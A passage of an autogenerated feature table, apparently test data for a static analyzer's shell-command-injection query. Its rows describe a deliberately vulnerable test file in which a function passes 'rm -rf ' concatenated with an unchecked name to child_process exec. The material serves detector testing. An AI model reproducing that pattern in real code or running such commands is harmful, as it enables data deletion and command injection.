autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:22:224:25 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:224:22:224:25 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:1:227:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:1:227:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:1:227:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:1:227:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:1:227:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:1:227:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:1:227:25 | module. ... essSync | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:1:227:25 | module. ... essSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:1:227:25 | module. ... essSync | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:1:237:1 | module. ... ENCY]\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:1:237:1 | module. ... ENCY]\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:1:237:1 | module. ... ENCY]\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:8:227:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:8:227:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:8:227:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:16:227:25 | accessSync | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:16:227:25 | accessSync | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:16:227:25 | accessSync | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:227:28 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:227:28 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:227:28 | cp | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:227:28 | cp | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:227:28 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:227:28 | path | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:227:28 | path | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:227:28 | path | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:227:28 | path | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:227:28 | path | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:227:28 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:227:28 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:227:28 | this | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:227:28 | this | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:227:28 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | 'arguments' object of anonymous function | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | exceptional return of anonymous function | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | functio ... ENCY]\\n} | assignedToPropName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | functio ... ENCY]\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | functio ... ENCY]\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | functio ... ENCY]\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | return of anonymous function | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:29:237:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:39:227:42 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:39:227:42 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:39:227:42 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:39:227:42 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:39:227:42 | name | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:39:227:42 | name | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:39:227:42 | name | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:39:227:42 | name | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:39:227:42 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:227:39:227:42 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:3 | cp | enclosingFunctionBody | name cp exec rm -rf name path accessSync name e cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:3 | cp | enclosingFunctionName | accessSync | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:228:2:228:8 | cp.exec | contextFunctionInterfaces | 